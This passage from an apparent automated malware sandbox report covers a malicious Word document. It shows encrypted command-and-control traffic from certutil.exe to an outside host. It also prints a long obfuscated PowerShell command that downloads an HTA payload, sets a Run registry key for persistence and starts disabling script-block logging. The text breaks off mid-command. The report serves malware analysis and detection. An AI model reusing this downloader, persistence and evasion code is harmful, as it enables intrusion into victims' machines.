2018-06-19 11:45:52 UTC	21	IN	Data Raw: 9d 43 a5 cc f7 2b 98 14 e6 ad c8 1e b4 17 d8 33 09 f9 34 19 e3 85 64 45 b0 5c 72 84 a6 b9 78 fa ce ef 31 46 28 07 9a 4d 68 48 5e 7f f9 2c 8a 40 16 62 87 46 46 51 9f 6f 47 1f 4d 20 a2 07 54 6d 03 cb 36 48 71 a1 b5 ae 77 0a db 23 0b 51 4e 83 dc 31 8b 2a 4a c5 d1 eb 04 2c 9d 06 6b bd 1a 28 9c 34 1b 98 23 9a a7 5f 7c 24 15 79 03 8d 4e 1b 5b c6 75 78 5d 5a bc c0 99 82 2a 46 6b 93 1b a2 e1 d7 4c 7c b6 10 40 c5 b3 20 f6 b7 b5 ad a9 7f 08 96 b0 b8 97 18 ba c6 7f 91 8e af 5e 7b 27 f9 f3 f4 f3 62 8d 23 a1 42 3d c2 76 68 b4 78 9f 46 de 53 6d 81 50 5f 91 2f 1f 6e a0 83 74 22 a8 18 35 4c da 2b 0c be d3 52 f8 ed 5f 59 89 db e4 07 36 de 2b c2 bc 91 c5 c6 16 9e d8 f2 4a 89 c6 9f 65 de a9 24 97 40 94 bf 6e 9f 9c dd 7b 02 4f 63 f9 c6 9b 62 a9 fe 06 72 9e a1 ff 85 d9 de 6f Data Ascii: C+34dE\rx1F(MhH^,@bFFQoGM Tm6Hqw#QN1J,k(4#_\|$yN[ux]ZFkL\|@ ^{'b#B=vhxFSmP_/nt"5L+R_Y6+Je$@n{Ocbro

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.1.81	49177	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:45:55 UTC	26	OUT	POST /modules/admin.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 462
2018-06-19 11:45:55 UTC	26	OUT	Data Raw: ee Data Ascii:
2018-06-19 11:45:55 UTC	26	OUT	Data Raw: 02 6f 6a 0c 61 1c 44 0d 86 a7 f6 ed 85 0a 91 12 b1 01 1f 21 42 6c a1 1c 68 5c a2 7a 95 b7 5b e4 08 d0 49 d5 2e dd 37 12 ad e6 de c0 a6 f8 72 71 63 b4 7a eb 8e 51 c4 4f 6a 55 7c 37 87 9d 76 f6 48 d1 be 40 8b 1b a6 b0 09 81 b1 c2 ea b7 75 75 e7 60 b8 ea a1 21 07 95 2f 65 a8 63 47 8f c7 2f 2c f2 f6 c4 3a ea 84 b1 8c 99 cc e2 ad e4 66 95 73 40 72 79 6e 9d 55 49 04 ae e3 a5 15 70 73 72 13 a9 62 db b6 e3 08 bb 81 9b 6c 01 50 99 5a 23 f5 4c 1b d3 91 1c 36 ae 6b a1 08 54 ed c4 1b a7 92 ab 90 14 3e 9c 5d 2d c7 24 17 af b8 ef 52 fb da 06 ba 09 5c 4b 13 82 f5 d5 54 95 8e e3 62 ee 68 e5 ce b2 af d8 90 ac b3 e3 a0 c8 9b fe 15 4b 1a 97 76 60 6e 30 4f c9 2d 54 ad f8 82 ac a3 6a 18 b3 3d a7 b8 4f 4e 8c 73 d4 47 2b ef 26 9d 75 59 7a 3f 36 78 9d 0e 9c 61 cd 22 5d f2 37 56 Data Ascii: ojaD!Blh\z[I.7rqczQOjU\|7vH@uu`!/ecG/,:fs@rynUIpsrblPZ#L6kT>]-$R\KTbhKv`n0O-Tj=ONsG+&uYz?6xa"]7V
2018-06-19 11:45:59 UTC	27	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Content-Length: 256 Date: Tue, 19 Jun 2018 11:45:59 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:45:59 UTC	27	IN	Data Raw: 64 59 68 59 8c 14 56 06 05 ab b0 54 ae da e4 41 9c 26 09 93 59 e9 04 74 26 bc 9c 34 ea 67 10 c5 0e 21 4c 1f b0 b1 85 41 6c 5f 45 79 5e bf f3 52 a9 7b e9 64 15 9a b4 d0 4f ec 7b 52 68 ce 64 61 a2 9f 45 39 e1 4c e9 1b 8f 3e 2e c0 c5 ef 42 76 c8 69 ce c4 cd 21 de 72 2d 5f 0d 7d 8e 1a 33 8d 01 3b 47 80 e8 32 24 f2 88 c2 5c 69 e3 95 5b 13 a5 8c a4 2e 96 e1 2a 6b 34 9e 43 7a 25 ee 0a 86 70 5b 6f 3e a1 d5 23 ca d7 f8 96 00 63 5e 2e 17 75 83 4a ef 2b 28 e0 de 7e c7 58 9d 06 2f 6d 0f f5 ab b1 b9 7a fc 65 79 44 3a 24 01 53 48 58 e3 24 ff c0 a5 d6 2c 95 29 27 dc 12 d7 b9 49 d0 7f c8 19 a5 4b 3f 63 4c c4 46 47 25 0b bd 2a 55 ce 96 9b 4c ce 5a ef a6 bd a5 48 63 98 0e 4a 04 50 4e ee 31 b4 b8 11 e0 2b ef 2c 4d fd 50 de 58 ff 71 fa 9b 3f e6 76 f0 e2 c9 d5 9e 1c 96 5d 25 Data Ascii: dYhYVTA&Yt&4g!LAl_Ey^R{dO{RhdaE9L>.Bvi!r-_}3;G2$\i[.k4Cz%p[o>#c^.uJ+(~X/mzeyD:$SHX$,)'IK?cLFG%ULZHcJPN1+,MPXq?v]%

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.1.81	49183	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:00 UTC	27	OUT	POST /modules/default.php HTTP/1.1 Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 206
2018-06-19 11:46:00 UTC	27	OUT	Data Raw: e1 Data Ascii:
2018-06-19 11:46:00 UTC	27	OUT	Data Raw: b7 44 29 c0 19 ea 32 ab ec a5 4d bd f2 e5 9e f7 d0 63 70 07 c6 4c 74 50 5f 41 21 6a fc 8f 63 38 a8 b1 ab ab 35 6c ae 7c fe 9a 7f a7 59 d9 40 37 7b 01 55 aa f2 85 3c f3 37 b5 e9 52 8e a8 85 e3 60 7d 86 dc 90 30 6c 0f 62 59 00 dd e2 7a 96 6e 1e 6c 28 32 2a 0a 39 19 78 23 60 4e 99 34 bc 2b 22 1b 33 69 75 a6 d1 35 45 f2 19 d8 9b 86 4e f9 70 fc 5b bd 6c ad 22 9e 0c 62 44 42 b5 13 c5 83 e4 95 35 ce 16 49 b7 99 ce d4 23 d7 87 9c 3d 44 20 8c 8c ff 84 d4 a1 03 b8 bb f1 c6 81 25 43 ec 85 ca 48 72 d1 0c 92 3b 1e 8d a3 c4 26 22 69 a3 a2 c1 cc 42 f1 c6 5a e3 44 f7 8d 64 75 68 89 91 f3 d0 7f 1a f8 fe 57 2e 2c ee 70 44 34 Data Ascii: D)2McpLtP_A!jc85l\|Y@7{U<7R`}0lbYznl(2*9x#`N4+"3iu5ENp[l"bDB5I#=D %CHr;&"iBZDduhW.,pD4
2018-06-19 11:46:19 UTC	28	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Tue, 19 Jun 2018 11:46:19 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:46:19 UTC	28	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2018-06-19 11:46:19 UTC	28	IN	Data Raw: 8d fc 8a db 94 55 85 08 7e cd 09 f2 78 c1 e5 26 31 e2 63 e0 76 44 33 d6 91 3b 8f 2f 26 2d 06 dd 9c 93 75 0d c5 ca 8e 55 98 95 0a b0 13 29 a6 81 a0 c8 3a 6e c8 4b fe 2f d0 3c d3 8b 80 c2 f0 d5 84 26 14 1c 42 64 0f a7 22 a8 e8 15 32 ab a6 ae f5 80 01 6a d4 82 11 63 8d 57 63 f8 f6 af f7 93 46 5d 3b e8 06 e2 ee 20 c5 2e 01 59 97 ea e2 d2 8e f4 7a c1 31 c2 c1 15 64 bd 44 6e fc 50 89 5f 4d fd b9 0b 4e c4 8b ca 9e 8a 0e f4 03 2d b2 da e1 ed 66 bb 2b 5a 53 09 8d 0c dd 7c e9 ef 04 fa af 99 41 94 43 4b e0 47 44 a8 ad 46 0f e1 a5 66 98 54 6b 4b e0 22 ed 0d a4 b5 3b 0b 49 9b a0 32 e3 c9 06 be cc 61 c1 b6 64 6e d9 cd cf db 4c 4c 20 0d 99 62 a8 63 da 93 1a 5c c7 e7 df 41 56 f8 0f 45 b3 94 5d 52 8f e7 29 ab 5e 83 f3 02 e5 69 6b 64 b5 8d 90 c9 3f 07 80 d6 42 93 cf 30 13 Data Ascii: U~x&1cvD3;/&-uU):nK/<&Bd"2jcWcF]; .Yz1dDnP_MN-f+ZS\|ACKGDFfTkK";I2adnLL bc\AVE]R)^ikd?B0
2018-06-19 11:46:19 UTC	36	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:19 UTC	36	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2018-06-19 11:46:19 UTC	36	IN	Data Raw: 3a e9 2e 25 03 eb 19 19 3d 7e 5f 49 78 f4 62 de 41 6e 38 12 50 51 17 52 3a 34 d5 78 0c 49 1c a8 b5 96 f4 dc 7f 22 c4 b9 34 89 1a 4b 83 8b 4a 31 6b 1d 06 c7 11 12 71 12 59 23 fe 28 05 cd 86 a0 45 3f 6f 73 2e b6 2e f1 8f 4c e5 44 24 2d 16 59 8a 11 40 73 e9 e7 11 97 6c 4c 0b fd f2 c1 96 f4 03 c7 e4 d6 da c8 36 fa da cb 0f 35 64 81 3d a4 b0 43 32 fd be 59 54 24 5b cb f5 7b 92 ea a6 a1 22 95 aa 61 38 c7 69 bf 52 1a f9 1a 7b 88 a7 80 18 e2 ac cf 17 70 11 d6 0e 36 19 91 cc bf 76 a5 26 10 03 72 b5 2a 87 2d 4c 60 c3 0b 63 1b 3e 01 73 d4 cb 50 b0 b3 16 de e2 d7 0d da 1c f7 19 4b ce fa 15 92 58 29 da 82 d8 18 f7 d0 0d d4 2b d1 62 77 9b ec de 2e 5e e4 f1 53 a0 be a9 be 9f 11 0c 81 54 d6 19 c1 3c d3 e6 a4 8d 3f 15 36 a8 89 a0 da f0 c6 9f b4 75 e7 d2 4a d9 d9 75 51 8a Data Ascii: :.%=~_IxbAn8PQR:4xI"4KJ1kqY#(E?os..LD$-Y@slL65d=C2YT$[{"a8iR{p6v&r*-L`c>sPKX)+bw.^ST<?6uJuQ
2018-06-19 11:46:19 UTC	44	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:19 UTC	44	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2018-06-19 11:46:19 UTC	44	IN	Data Raw: 1f 4e 0e 91 ff f4 a3 21 10 0c d8 77 d7 2c b5 05 21 56 a7 7d af 14 1d 70 e4 3f 6e fb 54 27 08 dd 0a 48 74 13 a7 30 fe 3f fe e1 2a 75 5f 0c ff 0e 54 35 e1 09 b9 32 15 15 43 3e 7f c5 05 98 89 89 aa d4 ac a8 ca 1f ab a2 56 21 f9 f4 65 8a ad ea 96 fe 4e 98 26 71 15 e7 43 67 fc 91 93 0e 99 8d a3 e1 ca 4e 2b 34 24 c8 1a ea 7e 7b f4 48 03 8e 35 ac 0d 73 41 57 59 49 7c 93 41 59 89 60 d0 cb 6c 63 07 6d cc a2 54 97 35 07 48 1d 44 4c f4 16 19 39 5d fb 7c 30 35 b7 24 08 83 eb 15 05 45 9c 7b 45 2f f4 4f 72 1d a1 b5 ca 5d 79 72 0b c9 d5 12 af 5a 76 9e ce 5c ac 2a 22 c2 9f bd b0 be ef 12 1b cb 4c 00 1b e4 02 c6 e7 f2 74 1a 51 06 7e 6f f9 ce 0c 0c f7 ba b6 4c ac a1 28 cf 67 50 26 51 81 7d c5 56 30 d6 97 96 f2 5d a7 b4 76 62 ce 46 9c ce 1b 1c b7 97 29 3c 0b 22 ba 05 95 b4 Data Ascii: N!w,!V}p?nT'Ht0?u_T52C>V!eN&qCgN+4$~{H5sAWYI\|AY`lcmT5HDL9]\|05$E{E/Or]yrZv\"LtQ~oL(gP&Q}V0]vbF)<"
2018-06-19 11:46:19 UTC	52	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:19 UTC	52	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2018-06-19 11:46:19 UTC	52	IN	Data Raw: 3d 72 91 b0 13 72 0a 86 09 8b a6 a8 aa 7c 5d 3f 7e 28 d3 7d 3e 8b f1 8a 8d a6 30 7e db 8e 32 e0 83 00 0b 21 2f fd 97 aa f5 51 c2 f9 c0 75 8c 33 31 b2 71 ec fa 2d c7 a5 a9 f6 1b c6 c2 f6 b6 52 1e 46 a3 e1 a4 15 54 86 fa 2b 94 b2 38 d2 20 c0 0b 40 8b a9 33 1b 34 e3 36 4c f8 0b 9f 70 1d 78 1f d6 e7 d1 f9 3b 62 7d 1e 3a b8 e4 73 b4 6d af 21 ac 90 fb 4d 59 77 48 f8 de 64 9c 50 36 de 67 7f 33 d1 9f 61 20 3f 39 31 51 a3 48 8d 5c 54 9c dd 4c e4 3b 41 8d 25 12 c3 f0 5f fc 96 7e 44 ae 71 7b 48 cb 7f 15 59 da 08 02 03 df 24 44 98 9c 1f e1 64 c1 db e4 f2 67 05 0d b3 de 2f 13 40 7d 44 98 db f2 74 b9 af dc 51 a2 0f 7f c6 f0 ff 10 01 62 2a e1 a0 8a f2 8c 3f df 14 fd 52 41 1f 5b 05 85 f4 65 91 e0 bc 99 53 7a 81 96 a1 47 96 43 a1 08 3b f2 05 67 0d 44 7b f6 f0 17 6c cb 09 Data Ascii: =rr\|]?~(}>0~2!/Qu31q-RFT+8 @346Lpx;b}:sm!MYwHdP6g3a ?91QH\TL;A%_~Dq{HY$Ddg/@}DtQb*?RA[eSzGC;gD{l
2018-06-19 11:46:19 UTC	60	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:19 UTC	60	IN	Data Raw: 31 35 62 61 0d 0a Data Ascii: 15ba
2018-06-19 11:46:19 UTC	60	IN	Data Raw: 10 39 20 9c b5 6b 61 91 2b c3 4e 67 92 1d a9 f0 11 1b 9f 40 3d 27 6e 3e 92 53 42 e7 15 ce 26 c6 b8 a3 80 75 1f 99 27 69 77 19 11 10 12 5f 60 26 d9 42 18 e9 dc ec 56 dd 29 5d dd 56 97 b2 ac b5 c4 c5 1e 05 df 61 a3 6c ab f1 ee 5a c8 6b 3c d7 cc 36 d4 f9 bb 61 88 73 30 da dc 86 74 c0 15 e3 8d 79 40 38 9c 62 1c b1 b9 3b a6 05 db 7d be 95 e6 89 44 76 42 81 c4 c7 e2 e0 25 63 fe 60 93 bf c9 b6 7a 6a e3 02 0c ff d2 dc 19 36 70 0c 93 47 b6 d4 3e f2 9e 5e d1 02 10 bd 79 a1 15 6f 4f 59 3c c7 29 a0 ff 36 6d c5 a9 9f 95 d8 21 da 06 6d 24 16 19 d8 87 d5 e7 e7 59 2a 66 c1 5a e7 53 27 8a ab 3e 22 21 9c b6 60 cc 22 ab fe c1 a6 cb 66 41 7e e6 4e cc 75 81 97 66 b9 0c 5d 1e ab 35 05 a9 19 9b e5 07 a9 43 de 08 4a b8 41 d5 25 fe 61 e3 8e 6a 24 a8 e6 f0 d6 12 a5 68 7e 86 75 e9 Data Ascii: 9 ka+Ng@='n>SB&u'iw_`&BV)]ValZk<6as0ty@8b;}DvB%c`zj6pG>^yoOY<)6m!m$Y*fZS'>"!`"fA~Nuf]5CJA%aj$h~u
2018-06-19 11:46:19 UTC	65	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:19 UTC	65	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.1.81	49194	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:24 UTC	65	OUT	GET /modules/default.php HTTP/1.1 Cookie: session=GTGEDi6ekpdvoTbGTxmvGYlZl9Y= User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org
2018-06-19 11:46:29 UTC	66	IN	HTTP/1.1 200 OK X-Powered-By: PHP/5.6.33 Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Date: Tue, 19 Jun 2018 11:46:29 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:46:29 UTC	66	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2018-06-19 11:46:29 UTC	66	IN	Data Raw: 74 c4 0a 85 0c 1c 42 a4 fa 1b 19 06 fd 2b f0 1a 45 2f fb 92 85 b2 90 ca 3a 54 84 66 6c 76 62 34 95 0c 77 02 4e 18 08 66 2d 52 eb 9e c1 cc 39 89 c7 e5 9e ed 85 4b f2 74 6c b1 11 e4 1a 4f 7d 0c bd 54 45 99 b1 2e 5b 6c d0 14 cd 25 60 8d f2 bd 7b eb 1e 88 e9 e5 95 c1 5f a8 f8 d3 52 04 91 89 e8 72 67 2f d6 0c 5c 4f 01 ab 4d 52 4e 33 a4 ab 6f 40 12 fc 58 67 1d 17 ac 89 09 58 d1 e7 0f 88 32 2e af 58 70 94 51 d9 83 dc 20 ff 25 cf d7 d1 ad 3c cc bc b1 96 a6 cc f9 4f c2 56 c0 61 e7 0d da 7b ee 13 31 44 87 73 5d 6a 18 06 f1 36 1c e4 66 01 e3 89 4f 72 a8 63 26 16 57 c1 f6 a3 4b e4 26 c5 55 52 fb 16 f9 02 2e 56 88 d2 47 30 a9 37 8c d9 8e 12 c9 b6 4e 73 82 5a e9 d7 ce 4d f1 72 56 29 ec 61 d9 33 af 0b 93 c3 eb 3a 51 11 1e 1d 88 22 01 5a ef 0f 90 b3 8d d5 20 74 83 62 1f Data Ascii: tB+E/:Tflvb4wNf-R9KtlO}TE.[l%`{_Rrg/\OMRN3o@XgX2.XpQ %<OVa{1Ds]j6fOrc&WK&UR.VG07NsZMrV)a3:Q"Z tb
2018-06-19 11:46:29 UTC	74	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:29 UTC	74	IN	Data Raw: 36 64 65 0d 0a Data Ascii: 6de
2018-06-19 11:46:29 UTC	74	IN	Data Raw: c7 f3 54 18 42 00 a6 39 d5 c6 e2 35 19 1f e7 e3 ee 6a 1c e5 39 57 36 90 16 4d f3 fa 9f 07 77 43 64 67 c9 89 e3 0b e6 7e e0 94 cf 0f 5e e0 12 e4 c7 60 98 85 e0 1c c2 4e 42 7a a2 c6 72 ef ea 40 85 ed a7 a0 6f ed 44 e4 8e 28 2e 59 ab 83 fb 0e e2 d2 f5 22 d5 6d 1f 33 b2 da 40 bc 6d c3 1b 35 2d 3d a8 ad d3 3b 58 53 f9 29 f3 16 53 94 06 7a 4b 32 3b 81 bc 2d de 47 83 33 0e 58 4c 22 b6 fe b7 86 23 80 20 38 60 b3 22 64 71 30 59 be fb 80 82 a6 eb 16 fc 95 5e db 5e e8 db 08 ad bf 32 6d 96 de 12 10 ce fb 0a 80 61 0c 6d 03 cc 2e 77 1a f8 1c 90 e9 f0 16 a4 eb 0a 22 f5 c3 df ef f2 a6 40 90 6b d0 09 b0 55 3a 2c 7a e1 29 d0 45 f7 21 1a 45 0e b4 d1 e9 d3 d8 12 db c0 9d 44 93 41 e3 c2 ec 61 4a 86 9b a1 cd f1 c1 60 4b 90 11 0a b9 65 0a 31 3f ac a9 75 c7 dc f4 56 9c 79 cd e9 Data Ascii: TB95j9W6MwCdg~^`NBzr@oD(.Y"m3@m5-=;XS)SzK2;-G3XL"# 8`"dq0Y^^2mam.w"@kU:,z)E!EDAaJ`Ke1?uVy
2018-06-19 11:46:29 UTC	76	IN	Data Raw: 0d 0a Data Ascii:
2018-06-19 11:46:29 UTC	76	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.1.81	49196	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:31 UTC	76	OUT	POST /modules/main.php HTTP/1.1 User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mysent.org Content-Length: 94
2018-06-19 11:46:31 UTC	76	OUT	Data Raw: 9e Data Ascii:
2018-06-19 11:46:31 UTC	76	OUT	Data Raw: 55 1d 34 9b 8e bb e8 2d 08 46 4b 30 2d 64 2e 18 a9 99 80 e9 fc e6 69 a9 9b a5 f1 a3 d4 42 39 a8 0e de 8b 26 6f 72 5d fa c5 11 0f 54 29 54 48 42 91 b6 3b bb 0d 6c 33 7c 4b 49 5e a6 b9 c9 21 59 55 00 cf bc 7e 7f 72 b2 fa b5 ea 31 99 0a dc 1f 5e 2a 7a ec 5b e8 1f 8e 86 a9 f2 c2 a3 Data Ascii: U4-FK0-d.iB9&or]T)THB;l3\|KI^!YU~r1^*z[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.1.81	49197	188.241.39.220	443	C:\Windows\System32\certutil.exe

Timestamp	kBytes transferred	Direction	Data
2018-06-19 11:46:33 UTC	76	OUT	GET /hpmys.txt HTTP/1.1 Host: mysent.org
2018-06-19 11:46:33 UTC	76	IN	HTTP/1.1 200 OK Last-Modified: Tue, 15 May 2018 06:08:21 GMT Content-Type: text/plain Content-Length: 4739 Date: Tue, 19 Jun 2018 11:46:33 GMT Accept-Ranges: bytes Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="35,37,38,39" Connection: close
2018-06-19 11:46:33 UTC	76	IN	Data Raw: 43 4d 44 2e 45 78 45 20 20 20 2f 43 20 20 22 73 65 74 20 20 20 4b 6a 56 3d 20 20 53 65 54 2d 56 61 72 49 41 42 6c 45 20 65 69 50 20 28 20 5b 74 59 50 65 5d 28 22 7b 37 7d 7b 35 7d 7b 31 7d 7b 31 31 7d 7b 30 7d 7b 33 7d 7b 32 7d 7b 36 7d 7b 38 7d 7b 34 7d 7b 31 30 7d 7b 39 7d 7b 31 32 7d 22 20 2d 46 20 27 44 27 2c 27 74 69 6f 4e 27 2c 27 6f 6e 41 72 59 27 2c 27 69 63 74 69 27 2c 27 74 45 27 2c 27 4c 6c 45 43 27 2c 27 5b 53 54 27 2c 27 63 4f 27 2c 27 52 69 6e 47 2c 53 59 53 27 2c 27 4f 42 4a 27 2c 27 4d 2e 27 2c 27 53 2e 47 65 6e 65 72 49 43 2e 27 2c 27 65 43 54 27 29 20 29 20 20 3b 20 24 7b 74 56 60 52 60 33 32 7d 20 20 3d 5b 74 59 70 45 5d 28 22 7b 32 7d 7b 30 7d 7b 33 7d 7b 31 7d 22 2d 46 27 52 27 2c 27 6c 6f 43 4b 27 2c 27 53 43 27 2c 27 69 50 74 42 27 Data Ascii: CMD.ExE /C "set KjV= SeT-VarIABlE eiP ( [tYPe]("{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}" -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]("{2}{0}{3}{1}"-F'R','loCK','SC','iPtB'

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3664 Parent PID: 2944

General

Start time:	13:44:23
Start date:	19/06/2018
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Spiez CONVERGENCE.doc
Imagebase:	0x2fa00000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.16470021362.05457000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.16471643789.05D66000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.16479129493.07B20000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3756 Parent PID: 3664

General

Start time:	13:44:37
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Sile','ntinue','o','n') ^\| .('{0}{1}{2}{3}'-f'W','her','e-Obje','ct') -FilterScript {(${_}.'MO`De'[0] -eq 'd')} ^\| ^&('%') {${_}.'F`UllnA`Me'}; do {${R} = ^&('{1}{0}{2}'-f 'Ran','Get-','dom') ${P`ATH}} While ((.('{0}{2}{1}' -f'Te','ath','st-P') ${R}) -and (${r}.('{1}{0}{2}'-f'owe','ToL','r').Invoke()).('{1}{0}{2}'-f 'in','Conta','s').Invoke(('{1}{0}'-f'emp','t')) -and (${r}.('{0}{1}{2}'-f'T','oL','ower').Invoke()).('{1}{0}'-f 's','Contain').Invoke('tmp') -and (${R}.('{0}{1}'-f'ToLow','er').Invoke()).('{2}{1}{0}' -f'ns','tai','Con').Invoke(('{1}{0}' -f'ache','c'))); ${s`AVE`path} = ${R}; ${Fu`Rl}=('{5}{0}{2}{6}{7}{8}{3}{4}{1}' -f'ps:','t','//mysen','ccess.log.t','x','htt','t.o','r','g/a'); ${sc`hP`AtH}=${sA`V`ep`AtH}+((('{3}{0}{1}{2}' -f'Cl','ibsy','s.hta','IT'))-replACE ([cHaR]73+[cHaR]84+[cHaR]67),[cHaR]92);.((('{1}{7}{3}{5}{6}{2}{9}{8}{0}{4}' -f 'x','C:fB9Window','m32fB9certutil','B9S','e','y','ste','sf','e','.'))-cRePLAcE 'fB9',[ChAr]92) -urlcache -split -f ${F`Url} ${s`chPa`Th} ^\| .('{0}{2}{1}' -f 'Out-','ull','N');.('{0}{1}{2}{3}' -f 'Se','t-','ItemProper','ty') -Path ((('{0}{12}{6}{10}{9}{8}{5}{4}{2}{3}{1}{7}{11}{14}{13}' -f 'HKC','ntV','pCur','re','owsTZ','rosoftTZpWind',':TZ','ers','pMic','eTZ','pSoftwar','ion','U','Run','TZp')).('{0}{1}' -f'REpl','ace').Invoke('TZp','\')) -Value ${sC`hp`ATh} -Name ('{1}{3}{0}{2}{4}' -f 'lightUpdat','Silw','eCo','er','reRun');${eRro`R`Ac`T`I`oNPrEF`ErEncE} = ('{3}{2}{4}{0}{1}' -f'nu','e','tlyCo','Silen','nti');IF(${pSVErS`iOn`T`ABLe}.'p`sVE`RsIon'.'m`AjoR' -Ge 3){${G`pF}= $MZs.'AsSEmb`ly'.('{2}{1}{0}' -f 'TYpe','t','GE').Invoke(('{1}{5}{3}{4}{2}{0}{6}'-f 'n.U','System.M','matio','nagemen','t.Auto','a','tils')).'GEtFie`lD'(('{1}{0}{4}{2}{5}{3}' -f'a','c','cyS','s','chedGroupPoli','etting'),'N'+('{3}{2}{1}{0}' -f'c','i','lic,Stat','onPub'));IF(${g`pf}){${G`pC}=${G`PF}.('{0}{1}{2}' -f 'GETVA','l','Ue').Invoke(${nU`lL});IF(${G`Pc}[('{0}{1}' -f'Scrip','tB')+('{2}{0}{1}{3}'-f 'gg','in','lockLo','g')]){${G`pc}[('{2}{0}{1}' -f 'ript','B','Sc')+('{2}{1}{0}{3}' -f 'kLogg','c','lo','ing')][('{3}{2}{0}{1}' -f'bleScri','ptB','a','En')+('{1}{0}{2}'-f 'og','lockL','ging')]=0;${g`pc}[('{0}{1}' -f 